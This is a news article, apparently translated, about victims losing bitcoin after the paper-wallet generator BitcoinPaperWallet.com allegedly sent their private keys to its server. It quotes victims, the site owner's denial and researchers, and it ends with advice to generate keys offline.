Paper wallets are considered a fairly secure way to store bitcoin. Such a wallet is not connected to the Internet, which means that once you print out a pair of public and private keys, the user will be able to use it in the future to safely transfer cryptocurrency for cold storage. This is so, if at the stage of creating keys, they are not recognized by someone else, as happened with the users of the service BitcoinPaperWallet.com.
Nick Wendell (alias) lost half a million dollars in bitcoin on January 7. The cryptocurrency exchange rate was approaching $40,000, and Wendell decided to transfer some of his assets to a paper wallet. Less than a minute after the transfer of 14.5 BTC to the address created with the help of the service, they left in an unknown direction. After several moves, the cryptocurrency found a home on Binance.
"Within a minute, I realized what had happened. For a few minutes I felt like I was falling, like I wasn't reaching the ground. I remember walking around in circles in the kitchen, as if my head was spinning, " Wendell said in a conversation with CoinDesk.
According to the portal, there are at least about half a dozen such victims. All of them claim that they lost large amounts of money after using the service. Presumably, the account of losses for the last two years goes to millions of dollars.
Experts found out that BitcoinPaperWallet sends a copy of each created private key to the server, that is, directly into the hands of attackers. Brothers Brian and Colin Olds, who run the blog PrivacyPros, said they were ready to buy the site last year, but came across evidence of fraud.
If the MetaMask or MyEtherWallet (MEW) wallet extensions are installed in the browser, they automatically detect BitcoinPaperWallet.com as a phishing resource and warn the user about it. In May 2020, the MyCrypto service also reported a "vulnerability" of this paper wallet, creating a " backdoor that exposes assets to the risk of theft."
The Olds claim that the backdoor described by MyCrypto in BitcoinPaperWallet is no longer present, but "someone actively changes the site device after publishing information about vulnerabilities", and users continue to lose money.
One of the victims reported that he deposited assets incrementally into the BitcoinPaperWallet wallet throughout August 2020, until they were withdrawn to Binance by outsiders on the 21st. "I confused it with another full-fledged website that I used a few years ago. In fact, I just entered a "paper bitcoin wallet" in Google, and this scam came out first, " he said.
Another claims to have lost 50.1 BTC in December. He sent the cryptocurrency to the proposed address, went to be tested for coronavirus, and when he returned, it was no longer there. Another user in May 2019 lost 1.8 BTC, and on Reddit they write about the theft of Bitcoin Cash from wallets created through the same site.
BitcoinPaperWallet users are encouraged to move the cursor around the screen, ostensibly to ensure randomness during the wallet creation process, but this does not affect the final result. Even more curiously, there is no such backdoor in the original code on Github. Until 2018, BitcoinPaperWallet was owned by Canton Becker, until he sold it to a certain Sarkis Sarkisian in April of the same year. Until that time, no one reported the loss of funds, and BitcoinPaperWallet itself was trusted in the community. Sarkisian claims that the money is lost by users who " initially did not manage the keys properly."
"Indeed, we receive complaints from users claiming that they have lost bitcoins after using our site. These complaints are always resolved, except in some cases, when users can not realize their own mistake and shift the blame to us, " he said. – We examined the source code for problems and were not able to achieve the same results. The servers and source code were checked for cleanliness by our security expert, Jonel Richard. He is still investigating, trying to reproduce the problem reported by others."
Something has been wrong with BitcoinPaperWallet since at least mid-2018, but users have not sounded the alarm for a long time. Presumably, only large wallets containing at least 1 BTC are emptied. According to reports, users of such wallets have lost at least 124.85 BTC worth $6.2 million at the current exchange rate.
Note that this is not the first such incident with paper wallets. Since mid-2018, wallets created through the WalletGenerator service have remained vulnerable. In his case, the randomization of the generated key pairs also turned out to be a fiction.
"It is critical that the keys are generated by a trusted provider in the complete absence of an Internet connection. Think of websites, your computer, and the Internet in general as voyeurs trying to spy on your data. Because sometimes that's what they do. They can empty the entire balance sheet if they succeed, " said independent bitcoin developer and researcher Dustin Dettmer.